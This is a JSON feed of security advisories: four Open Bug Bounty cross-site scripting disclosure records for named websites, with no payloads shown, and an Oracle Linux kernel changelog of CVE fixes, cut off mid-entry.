{"openbugbounty": [{"lastseen": "2020-09-29T06:15:30", "bulletinFamily": "bugbounty", "cvelist": [], "description": " \n\n\nFollowing coordinated and responsible vulnerability disclosure guidelines of the **[ISO 29147](<https://www.iso.org/standard/45170.html>)** standard, Open Bug Bounty has: \n\n&nbsp&nbsp&nbsp&nbsp&nbsp&nbspa. verified the vulnerability and confirmed its existence; \n&nbsp&nbsp&nbsp&nbsp&nbsp&nbspb. notified the website operator about its existence.\n\nAffected Website:| **[country93.ca](<http://www.country93.ca>) ** \n---|--- \nOpen Bug Bounty Program:| **Create your bounty program now**. It's open and free. \nVulnerable Application:| Custom Code \nVulnerability Type:| **[XSS (Cross Site Scripting)](<https://www.owasp.org/index.php/Cross-site_Scripting_\\(XSS\\)>)** / CWE-79 \nCVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N] \nDisclosure Standard:| Coordinated Disclosure based on **[ISO 29147](<https://www.iso.org/standard/45170.html>)** guidelines \nDiscovered and Reported by:| **Broly157 ** \nRemediation Guide:| **[OWASP XSS Prevention Cheat Sheet](<https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.md>)** \nExport Vulnerability Data:| Bugzilla Vulnerability Data \nJIRA Vulnerability Data [ Configuration ] \nMantis Vulnerability Data \nSplunk Vulnerability Data \nXML Vulnerability Data [ XSD ] \n \nVulnerable URL:\n\n \n--- \n \nResearch's Comment:\n\n \n--- \n \n**Screenshot:** \n\n**Mirror:** [Click here to view the mirror](<http://1235614.openbounty.org/mirror/>)\n\n### Coordinated Disclosure Timeline\n\nVulnerability Reported:| 23 July, 2020 08:31 GMT \n---|--- \nVulnerability Verified:| 23 July, 2020 08:40 GMT \nWebsite Operator Notified:| 23 July, 2020 08:40 GMT \na. Using the ISO 29147 guidelines|  \n---|--- \nb. Using publicly available security contacts|  \nc. Using Open Bug Bounty notification framework|  \nd. Using security contacts provided by the researcher|  \nPublic Report Published \n[without any technical details]:| 23 July, 2020 08:40 GMT \nVulnerability Fixed:| 31 August, 2020 20:02 GMT \n---|---\n", "modified": "2020-08-22T08:31:00", "published": "2020-07-23T08:31:00", "id": "OBB:1235614", "href": "https://www.openbugbounty.org/reports/1235614/", "type": "openbugbounty", "title": "country93.ca Cross Site Scripting vulnerability OBB-1235614 ", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-08-20T01:25:26", "bulletinFamily": "bugbounty", "cvelist": [], "description": " \n\n\nOpen Bug Bounty ID: OBB-1166019\n\nFollowing coordinated and responsible vulnerability disclosure guidelines of the **[ISO 29147](<https://www.iso.org/standard/45170.html>)** standard, Open Bug Bounty has: \n\n&nbsp&nbsp&nbsp&nbsp&nbsp&nbspa. verified the vulnerability and confirmed its existence; \n&nbsp&nbsp&nbsp&nbsp&nbsp&nbspb. notified the website operator about its existence.\n\nAffected Website:| **[wego.ly](<https://www.wego.ly>) ** \n---|--- \nOpen Bug Bounty Program:| **Create your bounty program now**. It's open and free. \nVulnerable Application:| Custom Code \nVulnerability Type:| **[XSS (Cross Site Scripting)](<https://www.owasp.org/index.php/Cross-site_Scripting_\\(XSS\\)>)** / CWE-79 \nCVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N] \nDisclosure Standard:| Coordinated Disclosure based on **[ISO 29147](<https://www.iso.org/standard/45170.html>)** guidelines \nDiscovered and Reported by:| **metamorfosec ** \nRemediation Guide:| **[OWASP XSS Prevention Cheat Sheet](<https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.md>)** \nExport Vulnerability Data:| Bugzilla Vulnerability Data \nJIRA Vulnerability Data [ Configuration ] \nMantis Vulnerability Data \nSplunk Vulnerability Data \nXML Vulnerability Data [ XSD ] \n \nVulnerable URL:\n\n \n--- \n \nCookies:\n\n \n--- \n \nResearch's Comment:\n\n \n--- \n \n**Screenshot:** \n\n**Mirror:** [Click here to view the mirror](<http://1166019.openbounty.org/mirror/>)\n\n### Coordinated Disclosure Timeline\n\nVulnerability Reported:| 19 May, 2020 15:52 GMT \n---|--- \nVulnerability Verified:| 19 May, 2020 16:05 GMT \nWebsite Operator Notified:| 19 May, 2020 16:05 GMT \na. Using the ISO 29147 guidelines|  \n---|--- \nb. Using publicly available security contacts|  \nc. Using Open Bug Bounty notification framework|  \nd. Using security contacts provided by the researcher|  \nPublic Report Published \n[without any technical details]:| 19 May, 2020 16:05 GMT\n", "modified": "2020-08-17T15:52:00", "published": "2020-05-19T15:52:00", "id": "OBB:1166019", "href": "https://www.openbugbounty.org/reports/1166019/", "type": "openbugbounty", "title": "wego.ly Cross Site Scripting vulnerability ", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-07-30T22:27:51", "bulletinFamily": "bugbounty", "cvelist": [], "description": " \n\n\nOpen Bug Bounty ID: OBB-1009980\n\nSecurity Researcher **geeknik Helped patch 8881 vulnerabilities \nReceived 8 Coordinated Disclosure badges \nReceived 21 recommendations **, a holder of 8 badges for responsible and coordinated disclosure, found a security vulnerability affecting **[gajmarket.com](<http://www.gajmarket.com>)** website and its users. \n\nFollowing coordinated and responsible vulnerability disclosure guidelines of the **[ISO 29147](<https://www.iso.org/standard/45170.html>)** standard, Open Bug Bounty has: \n\n&nbsp&nbsp&nbsp&nbsp&nbsp&nbspa. verified the vulnerability and confirmed its existence; \n&nbsp&nbsp&nbsp&nbsp&nbsp&nbspb. notified the website operator about its existence.\n\nAffected Website:| **[gajmarket.com](<http://www.gajmarket.com>) ** \n---|--- \nOpen Bug Bounty Program:| **Create your bounty program now**. It's open and free. \nVulnerable Application:| Custom Code \nVulnerability Type:| **[XSS (Cross Site Scripting)](<https://www.owasp.org/index.php/Cross-site_Scripting_\\(XSS\\)>)** / CWE-79 \nCVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N] \nDisclosure Standard:| Coordinated Disclosure based on **[ISO 29147](<https://www.iso.org/standard/45170.html>)** guidelines \nDiscovered and Reported by:| **geeknik Helped patch 8881 vulnerabilities \nReceived 8 Coordinated Disclosure badges \nReceived 21 recommendations ** \nRemediation Guide:| **[OWASP XSS Prevention Cheat Sheet](<https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.md>)** \nExport Vulnerability Data:| Bugzilla Vulnerability Data \nJIRA Vulnerability Data [ Configuration ] \nMantis Vulnerability Data \nSplunk Vulnerability Data \nXML Vulnerability Data [ XSD ] \n \nVulnerable URL:\n\n \n--- \n \n**Mirror:** [Click here to view the mirror](<http://1009980.openbounty.org/mirror/>)\n\n### Coordinated Disclosure Timeline\n\nVulnerability Reported:| 8 November, 2019 16:55 GMT \n---|--- \nVulnerability Verified:| 11 November, 2019 07:59 GMT \nWebsite Operator Notified:| 11 November, 2019 07:59 GMT \na. Using the ISO 29147 guidelines|  \n---|--- \nb. Using publicly available security contacts|  \nc. Using Open Bug Bounty notification framework|  \nd. Using security contacts provided by the researcher|  \nPublic Report Published \n[without any technical details]:| 11 November, 2019 07:59 GMT \nPublic Disclosure: A security researcher can delete the report before public disclosure, afterwards the report cannot be deleted or modified anymore. The researcher can also postpone public disclosure date as long as reasonably required to remediate the vulnerability.| 6 February, 2020 16:55 GMT \n---|---\n", "modified": "2020-02-06T16:55:00", "published": "2019-11-08T16:55:00", "id": "OBB:1009980", "href": "https://www.openbugbounty.org/reports/1009980/", "type": "openbugbounty", "title": "gajmarket.com Cross Site Scripting vulnerability ", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-06-22T22:05:36", "bulletinFamily": "bugbounty", "cvelist": [], "description": "Security Researcher **metamorfosec Helped patch 1935 vulnerabilities \nReceived 9 Coordinated Disclosure badges \nReceived 31 recommendations **, a holder of 9 badges for responsible and coordinated disclosure, found a security vulnerability affecting **[konstnarernas.se](<https://konstnarernas.se>)** website and its users. \n\nFollowing coordinated and responsible vulnerability disclosure guidelines of the **[ISO 29147](<https://www.iso.org/standard/45170.html>)** standard, Open Bug Bounty has: \n\n&nbsp&nbsp&nbsp&nbsp&nbsp&nbspa. verified the vulnerability and confirmed its existence; \n&nbsp&nbsp&nbsp&nbsp&nbsp&nbspb. notified the website operator about its existence.\n\nAffected Website:| **[konstnarernas.se](<https://konstnarernas.se>) ** \n---|--- \nOpen Bug Bounty Program:| **Create your bounty program now**. It's open and free. \nVulnerable Application:| Custom Code \nVulnerability Type:| **[XSS (Cross Site Scripting)](<https://www.owasp.org/index.php/Cross-site_Scripting_\\(XSS\\)>)** / CWE-79 \nCVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N] \nDisclosure Standard:| Coordinated Disclosure based on **[ISO 29147](<https://www.iso.org/standard/45170.html>)** guidelines \nDiscovered and Reported by:| **metamorfosec Helped patch 1935 vulnerabilities \nReceived 9 Coordinated Disclosure badges \nReceived 31 recommendations ** \nRemediation Guide:| **[OWASP XSS Prevention Cheat Sheet](<https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.md>)** \nExport Vulnerability Data:| Bugzilla Vulnerability Data \nJIRA Vulnerability Data [ Configuration ] \nMantis Vulnerability Data \nSplunk Vulnerability Data \nXML Vulnerability Data [ XSD ] \n \nVulnerable URL:\n\n \n--- \n \nCookies:\n\n \n--- \n \nResearch's Comment:\n\n \n--- \n \n**Screenshot:** \n\n**Mirror:** [Click here to view the mirror](<http://1005427.openbounty.org/mirror/>)\n\n### Coordinated Disclosure Timeline\n\nVulnerability Reported:| 29 October, 2019 03:41 GMT \n---|--- \nVulnerability Verified:| 29 October, 2019 03:46 GMT \nWebsite Operator Notified:| 29 October, 2019 03:46 GMT \na. Using the ISO 29147 guidelines|  \n---|--- \nb. Using publicly available security contacts|  \nc. Using Open Bug Bounty notification framework|  \nd. Using security contacts provided by the researcher|  \nPublic Report Published \n[without any technical details]:| 29 October, 2019 03:46 GMT \nPublic Disclosure: A security researcher can delete the report before public disclosure, afterwards the report cannot be deleted or modified anymore. The researcher can also postpone public disclosure date as long as reasonably required to remediate the vulnerability.| 27 January, 2020 03:41 GMT \n---|---\n", "modified": "2020-01-27T03:41:00", "published": "2019-10-29T03:41:00", "id": "OBB:1005427", "href": "https://www.openbugbounty.org/reports/1005427/", "type": "openbugbounty", "title": "konstnarernas.se Cross Site Scripting vulnerability ", "cvss": {"score": 0.0, "vector": "NONE"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:35:09", "bulletinFamily": "unix", "cvelist": ["CVE-2017-11176", "CVE-2017-5753", "CVE-2016-8650", "CVE-2017-5754", "CVE-2017-7895", "CVE-2016-7910", "CVE-2017-1000111", "CVE-2017-7616", "CVE-2017-7889", "CVE-2017-9074", "CVE-2017-6001", "CVE-2017-18203", "CVE-2017-2636", "CVE-2017-2671", "CVE-2017-14106", "CVE-2017-9075", "CVE-2017-8824", "CVE-2017-13166", "CVE-2018-1130", "CVE-2017-1000251", "CVE-2017-1000253", "CVE-2017-1000112", "CVE-2017-5715", "CVE-2015-8830", "CVE-2012-6701", "CVE-2017-6214", "CVE-2017-1000364", "CVE-2017-7541", "CVE-2017-1000410", "CVE-2017-7308", "CVE-2017-9076", "CVE-2017-9077", "CVE-2017-7542", "CVE-2017-15121", "CVE-2017-18017", "CVE-2018-5803", "CVE-2017-8890", "CVE-2017-12190", "CVE-2018-3639"], "description": "[2.6.32-754.OL6]\n- Update genkey [bug 25599697]\n[2.6.32-754]\n- [powerpc] 64s: Add support for a store forwarding barrier at kernel entry/exit (Mauricio Oliveira) [1581053] {CVE-2018-3639}\n- [x86] amd: Disable AMD SSBD mitigation in a VM (Waiman Long) [1580360]\n- [x86] spec_ctrl: Fix late microcode problem with AMD (Waiman Long) [1566899] {CVE-2018-3639}\n- [x86] spec_ctrl: Clean up entry code & remove unused APIs (Waiman Long) [1566899] {CVE-2018-3639}\n- [x86] spec_ctrl: Mask off SPEC_CTRL MSR bits that are managed by kernel (Waiman Long) [1566899] {CVE-2018-3639}\n- [x86] spec_ctrl: add support for SSBD to RHEL IBRS entry/exit macros (Waiman Long) [1566899] {CVE-2018-3639}\n- [x86] bugs: Rename _RDS to _SSBD (Waiman Long) [1566899] {CVE-2018-3639}\n- [x86] speculation: Add prctl for Speculative Store Bypass mitigation (Waiman Long) [1566899] {CVE-2018-3639}\n- [x86] process: Allow runtime control of Speculative Store Bypass (Waiman Long) [1566899] {CVE-2018-3639}\n- [kernel] prctl: Add speculation control prctls (Waiman Long) [1566899] {CVE-2018-3639}\n- [x86] kvm: Expose the RDS bit to the guest (Waiman Long) [1566899] {CVE-2018-3639}\n- [x86] bugs/AMD: Add support to disable RDS on Fam(15, 16, 17)h if requested (Waiman Long) [1566899] {CVE-2018-3639}\n- [x86] spec_ctrl: Sync up RDS setting with IBRS code (Waiman Long) [1566899] {CVE-2018-3639}\n- [x86] bugs: Provide boot parameters for the spec_store_bypass_disable mitigation (Waiman Long) [1566899] {CVE-2018-3639}\n- [x86] bugs: Expose the /sys/../spec_store_bypass and X86_BUG_SPEC_STORE_BYPASS (Waiman Long) [1566899] {CVE-2018-3639}\n- [x86] bugs: Read SPEC_CTRL MSR during boot and re-use reserved bits (Waiman Long) [1566899] {CVE-2018-3639}\n- [x86] spec_ctrl: Use separate PCP variables for IBRS entry and exit (Waiman Long) [1566899] {CVE-2018-3639}\n- [x86] cpu/intel: Knight Mill and Moorefield update to intel-family.h (Waiman Long) [1566899] {CVE-2018-3639}\n- [x86] speculation: Update Speculation Control microcode blacklist (Waiman Long) [1566899] {CVE-2018-3639}\n- [x86] cpuid: Fix up 'virtual' IBRS/IBPB/STIBP feature bits on Intel (Waiman Long) [1566899] {CVE-2018-3639}\n- [x86] cpufeatures: Clean up Spectre v2 related CPUID flags (Waiman Long) [1566899] {CVE-2018-3639}\n- [x86] cpufeatures: Add AMD feature bits for Speculation Control (Waiman Long) [1566899] {CVE-2018-3639}\n- [x86] cpufeatures: Add Intel feature bits for Speculation (Waiman Long) [1566899] {CVE-2018-3639}\n- [x86] cpufeatures: Add CPUID_7_EDX CPUID leaf (Waiman Long) [1566899] {CVE-2018-3639}\n- [x86] cpu: Fill in feature word 13, CPUID_8000_0008_EBX (Waiman Long) [1566899] {CVE-2018-3639}\n- [x86] Extend RH cpuinfo to 10 extra words (Waiman Long) [1566899] {CVE-2018-3639}\n- [x86] invpcid: Enable 'noinvpcid' boot parameter for X86_32 (Waiman Long) [1560494]\n- [x86] dumpstack_32: Fix kernel panic in dump_trace (Waiman Long) [1577351]\n- [fs] gfs2: For fs_freeze, do a log flush and flush the ail1 list (Robert S Peterson) [1569148]\n- [net] dccp: check sk for closed state in dccp_sendmsg() (Stefano Brivio) [1576586] {CVE-2018-1130}\n- [net] ipv6: dccp: add missing bind_conflict to dccp_ipv6_mapped (Stefano Brivio) [1576586] {CVE-2018-1130}\n[2.6.32-753]\n- [x86] vm86-32: Properly set up vm86-32 stack for task switching (Waiman Long) [1572865]\n- [x86] spec_ctrl: Enable IBRS and RSB stuffing in 32-bit interrupts (Waiman Long) [1571362]\n- [x86] entry/32: Fix regressions in 32-bit debug exception (Waiman Long) [1571362]\n[2.6.32-752]\n- [x86] kpti/kexec: fix wrong page address in clear_page (Dave Young) [1572487]\n- [fs] fix WARNING in rmdir() (Miklos Szeredi) [1282117]\n- [net] sctp: label accepted/peeled off sockets (Marcelo Leitner) [1571357]\n- [net] security: export security_sk_clone (Marcelo Leitner) [1571357]\n[2.6.32-751]\n- [md] dm thin: fix regression that caused discards to be disabled if passdown was (Mike Snitzer) [1569377]\n- [s390] configs: enable auto expoline support (Hendrik Brueckner) [1554959]\n- [s390] correct nospec auto detection init order (Hendrik Brueckner) [1554959]\n- [s390] add sysfs attributes for spectre (Hendrik Brueckner) [1554959]\n- [s390] report spectre mitigation via syslog (Hendrik Brueckner) [1554959]\n- [s390] add automatic detection of the spectre defense (Hendrik Brueckner) [1554959]\n- [s390] move nobp parameter functions to nospec-branch.c (Hendrik Brueckner) [1554959]\n- [s390] do not bypass BPENTER for interrupt system calls (Hendrik Brueckner) [1554959]\n- [s390] Replace IS_ENABLED(EXPOLINE_*) with IS_ENABLED(CONFIG_EXPOLINE_*) (Hendrik Brueckner) [1554959]\n- [s390] introduce execute-trampolines for branches (Hendrik Brueckner) [1554959]\n- [s390] run user space and KVM guests with modified branch prediction (Hendrik Brueckner) [1554959]\n- [s390] add optimized array_index_mask_nospec (Hendrik Brueckner) [1554959]\n- [s390] scrub registers on kernel entry and KVM exit (Hendrik Brueckner) [1554959]\n- [s390] align and prepare spectre mitigation for upstream commits (Hendrik Brueckner) [1554959]\n- [x86] xen: do not use xen_info on HVM, set pv_info name to 'Xen HVM' (Vitaly Kuznetsov) [1568241]\n- [net] sctp: verify size of a new chunk in _sctp_make_chunk() (Stefano Brivio) [1551908] {CVE-2018-5803}\n[2.6.32-750]\n- [fs] fuse: fix punching hole with unaligned end (Miklos Szeredi) [1387473] {CVE-2017-15121}\n- [documentation] kdump: fix documentation about panic_on_warn to match r (Pingfan Liu) [1555196]\n- [fs] Provide sane values for nlink (Leif Sahlberg) [1554342]\n[2.6.32-749]\n- [powerpc] pseries: Restore default security feature flags on setup (Mauricio Oliveira) [1561788]\n- [powerpc] Move default security feature flags (Mauricio Oliveira) [1561788]\n- [powerpc] pseries: Fix clearing of security feature flags (Mauricio Oliveira) [1561788]\n- [powerpc] 64s: Wire up cpu_show_spectre_v2() (Mauricio Oliveira) [1561788]\n- [powerpc] 64s: Wire up cpu_show_spectre_v1() (Mauricio Oliveira) [1561788]\n- [powerpc] pseries: Use the security flags in pseries_setup_rfi_flush() (Mauricio Oliveira) [1561788]\n- [powerpc] 64s: Enhance the information in cpu_show_meltdown() (Mauricio Oliveira) [1561788]\n- [powerpc] 64s: Move cpu_show_meltdown() (Mauricio Oliveira) [1561788]\n- [powerpc] pseries: Set or clear security feature flags (Mauricio Oliveira) [1561788]\n- [powerpc] Add security feature flags for Spectre/Meltdown (Mauricio Oliveira) [1561788]\n- [powerpc] pseries: Add new H_GET_CPU_CHARACTERISTICS flags (Mauricio Oliveira) [1561788]\n- [lib] seq: Add seq_buf_printf() (Mauricio Oliveira) [1561788]\n- [powerpc] rfi-flush: Call setup_rfi_flush() after LPM migration (Mauricio Oliveira) [1561786]\n- [powerpc] rfi-flush: Differentiate enabled and patched flush types (Mauricio Oliveira) [1561786]\n- [powerpc] rfi-flush: Always enable fallback flush on pseries (Mauricio Oliveira) [1561786]\n- [powerpc] rfi-flush: Make it possible to call setup_rfi_flush() again (Mauricio Oliveira) [1561786]\n- [powerpc] rfi-flush: Move the logic to avoid a redo into the debugfs code (Mauricio Oliveira) [1561786]\n- [x86] pti/32: Dont use trampoline stack on Xen PV (Waiman Long) [1562725]\n- [x86] pti: Use boot_cpu_has(X86_FEATURE_PTI_SUPPORT) for early call sites (Waiman Long) [1562725]\n- [x86] pti: Set X86_FEATURE_PTI_SUPPORT early (Waiman Long) [1562725]\n- [x86] pti: Rename X86_FEATURE_NOPTI to X86_FEATURE_PTI_SUPPORT (Waiman Long) [1562725]\n- [x86] pti/32: Fix setup_trampoline_page_table() bug (Waiman Long) [1562725]\n- [x86] entry: Remove extra argument in call instruction (Waiman Long) [1562552]\n- [x86] syscall: Fix ia32_ptregs handling bug in 64-bit kernel (Waiman Long) [1557562 1562552]\n- [x86] efi/64: Align efi_pgd on even page boundary (Waiman Long) [1558845]\n- [x86] pgtable/pae: Revert 'Use separate kernel PMDs for user page-table' (Waiman Long) [1558845]\n- [x86] pgtable/pae: Revert 'Unshare kernel PMDs when PTI is enabled' (Waiman Long) [1558845]\n- [x86] mm: Dump both kernel & user page tables at fault (Waiman Long) [1558845]\n- [x86] entry/32: Fix typo in PARANOID_EXIT_TO_KERNEL_MODE (Waiman Long) [1558845]\n[2.6.32-748]\n- [mm] fold arch_randomize_brk into ARCH_HAS_ELF_RANDOMIZE (Bhupesh Sharma) [1494380]\n- [mm] brk: fix min_brk lower bound computation for COMPAT_BRK (Bhupesh Sharma) [1494380]\n- [mm] split ET_DYN ASLR from mmap ASLR (Bhupesh Sharma) [1494380]\n- [s390] redefine randomize_et_dyn for ELF_ET_DYN_BASE (Bhupesh Sharma) [1494380]\n- [mm] expose arch_mmap_rnd when available (Bhupesh Sharma) [1494380]\n- [s390] standardize mmap_rnd() usage (Bhupesh Sharma) [1494380]\n- [s390] mmap: randomize mmap base for bottom up direction (Bhupesh Sharma) [1494380]\n- [powerpc] standardize mmap_rnd() usage (Bhupesh Sharma) [1494380]\n- [x86] standardize mmap_rnd() usage (Bhupesh Sharma) [1494380]\n- [fs] binfmt_elf: create Kconfig variable for PIE randomization (Bhupesh Sharma) [1494380]\n- [fs] binfmt_elf: PIE: make PF_RANDOMIZE check comment more accurate (Bhupesh Sharma) [1494380]\n- [fs] binfmt_elf: fix PIE execution with randomization disabled (Bhupesh Sharma) [1494380]\n- [acpi] acpica: Support calling _REG methods within ACPI interpreter (Lenny Szubowicz) [1522849]\n- [acpi] acpica: Function to test if ACPI interpreter already entered (Lenny Szubowicz) [1522849]\n- [acpi] acpica: Function to test if ACPI mutex held by this thread (Lenny Szubowicz) [1522849]\n[2.6.32-747]\n- [fs] gfs2: Check for the end of metadata in trunc_dealloc (Robert S Peterson) [1559928]\n- [fs] gfs2: clear journal live bit in gfs2_log_flush (Robert S Peterson) [1559928]\n- [netdrv] vmxnet3: fix tx data ring copy for variable size (Neil Horman) [1530378]\n- [mm] account skipped entries to avoid looping in find_get_pages (Dave Wysochanski) [1559386]\n- [powerpc] pseries: Support firmware disable of RFI flush (Mauricio Oliveira) [1554631]\n- [powerpc] pseries: Add H_GET_CPU_CHARACTERISTICS flags & wrapper (Mauricio Oliveira) [1554631]\n- [powerpc] 64s: Allow control of RFI flush via debugfs (Mauricio Oliveira) [1554630]\n- [powerpc] 64s: Improve RFI L1-D cache flush fallback (Mauricio Oliveira) [1554630]\n- [powerpc] 64s: Wire up cpu_show_meltdown() (Mauricio Oliveira) [1554630]\n[2.6.32-746]\n- [dm] fix race between dm_get_from_kobject() and __dm_destroy() (Mike Snitzer) [1551999] {CVE-2017-18203}\n- [x86] pti: Disable kaiser_add_mapping if X86_FEATURE_NOPTI (Waiman Long) [1557562]\n- [x86] irq/ioapic: Check for valid irq_cfg pointer in smp_irq_move_cleanup_interrupt (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] kexec/64: Clear control page after PGD init (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] efi/64: Fix potential PTI data corruption problem (Waiman Long) [1550599] {CVE-2017-5754}\n- [ipmi] pick up slave address from SMBIOS on an ACPI device (Tony Camuso) [1484525]\n- [ipmi] fix watchdog timeout set on reboot (Tony Camuso) [1484525]\n- [ipmi] fix watchdog hang on panic waiting for ipmi response (Tony Camuso) [1484525]\n- [ipmi] use smi_num for init_name (Tony Camuso) [1484525]\n- [ipmi] move platform device creation earlier in the initialization (Tony Camuso) [1484525]\n- [ipmi] clean up printks (Tony Camuso) [1484525]\n- [ipmi] cleanup error return (Tony Camuso) [1484525]\n- [md] raid0: apply base queue limits *before* disk_stack_limits (Xiao Ni) [1417294]\n- [md] raid0: update queue parameter in a safer location (Xiao Ni) [1417294]\n- [md] raid0: conditional mddev->queue access to suit dm-raid (Xiao Ni) [1417294]\n- [md] raid0: access mddev->queue (request queue member) conditionally because it is not set when accessed from dm-raid (Xiao Ni) [1417294]\n[2.6.32-745]\n- [x86] pti/mm: Fix machine check with PTI on old AMD CPUs (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] pti/mm: Enable PAGE_GLOBAL if not affected by Meltdown (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] retpoline: Avoid retpolines for built-in __init functions (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] kexec/32: Allocate 8k PGD for PTI (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] spec_ctrl: Patch out lfence on old 32-bit CPUs (Waiman Long) [1550599] {CVE-2017-5754}\n- [v4l] media: v4l2-compat-ioctl32.c: refactor compat ioctl32 logic fixup (Jarod Wilson) [1548432] {CVE-2017-13166}\n- [scsi] lpfc: Fix crash from memory alloc at interrupt level with GFP_KERNEL set (Dick Kennedy) [1540706]\n[2.6.32-744]\n- [dm] io: fix duplicate bio completion due to missing ref count (Mikulas Patocka) [1334224]\n- [fs] gfs2: Reduce contention on gfs2_log_lock (Robert S Peterson) [1399822]\n- [fs] gfs2: Inline function meta_lo_add (Robert S Peterson) [1399822]\n- [fs] gfs2: Switch tr_touched to flag in transaction (Robert S Peterson) [1399822]\n[2.6.32-743]\n- [v4l] media: v4l2-compat-ioctl32.c: refactor compat ioctl32 logic (Jarod Wilson) [1548432] {CVE-2017-13166}\n- [kernel] cgroup: initialize xattr before calling d_instantiate() (Aristeu Rozanski) [1533523]\n- [fs] ext*: Dont clear SGID when inheriting ACLs (Andreas Grunbacher) [1473482]\n- [fs] gfs2: writeout truncated pages (Robert S Peterson) [1331076]\n- [fs] export __block_write_full_page (Robert S Peterson) [1331076]\n- [scsi] mark queue as PREEMPT_ONLY before setting quiesce (Ming Lei) [1462959]\n- [block] call blk_queue_enter() before allocating request (Ming Lei) [1462959]\n- [block] introduce blk_queue_enter() (Ming Lei) [1462959]\n- [mm] shmem: replace_page must flush_dcache and others (Waiman Long) [1412337]\n- [mm] shmem: replace page if mapping excludes its zone (Waiman Long) [1412337]\n- [x86] cpufeature: Blacklist SPEC_CTRL/PRED_CMD on early Spectre v2 microcodes (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] spec_ctrl/32: Enable IBRS processing on kernel entries & exits (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] spec_ctrl/32: Stuff RSB on kernel entry (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] pti: Allow CONFIG_PAGE_TABLE_ISOLATION for x86_32 (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] pti/32: Add a PAE specific version of __pti_set_user_pgd (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] mm/dump_pagetables: Support PAE page table dumping (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] pgtable/pae: Use separate kernel PMDs for user page-table (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] mm/pae: Populate valid user PGD entries (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] pti: Enable x86-32 for kaiser.c (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] pti: Disable PCID handling in x86-32 TLB flushing code (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] pgtable: Disable user PGD poisoning for PAE (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] pgtable: Move more PTI functions out of pgtable_64.h (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] pgtable: Move pgdp kernel/user conversion functions to pgtable.h (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] pgtable/32: Allocate 8k page-tables when PTI is enabled (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] pgtable/pae: Unshare kernel PMDs when PTI is enabled (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] entry/32: Handle debug exception similar to NMI (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] entry/32: Add PTI cr3 switch to non-NMI entry/exit points (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] entry/32: Add PTI cr3 switches to NMI handler code (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] entry/32: Introduce SAVE_ALL_NMI and RESTORE_ALL_NMI (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] entry/32: Enable the use of trampoline stack (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] entry/32: Change INT80 to be an interrupt gate (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] entry/32: Handle Entry from Kernel-Mode on Entry-Stack (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] entry/32: Leave the kernel via trampoline stack (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] entry/32: Enter the kernel via trampoline stack (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] entry/32: Restore segments before int registers (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] entry/32: Split off return-to-kernel path (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] entry/32: Unshare NMI return path (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] entry/32: Put ESPFIX code into a macro (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] entry/32: Load task stack from x86_tss.sp1 in SYSENTER handler (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] entry/32: Rename TSS_sysenter_sp0 to TSS_entry_stack (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] pti: Add X86_FEATURE_NOPTI to permanently disable PTI (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] entry/32: Simplify and fix up the SYSENTER stack #DB/NMI fixup (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] doublefault: Set the right gs register for doublefault (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] syscall: int80 must not clobber r12-15 (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] syscall: change ia32_syscall() to create the full register frame in ia32_do_call() (Waiman Long) [1550599] {CVE-2017-5754}\n- [x86] cve: Make all Meltdown/Spectre percpu variables available to x86-32 (Waiman Long) [1550599] {CVE-2017-5754}\n[2.6.32-742]\n- [mm] prevent /proc/sys/vm/percpu_pagelist_fraction divide-by-zero (Dave 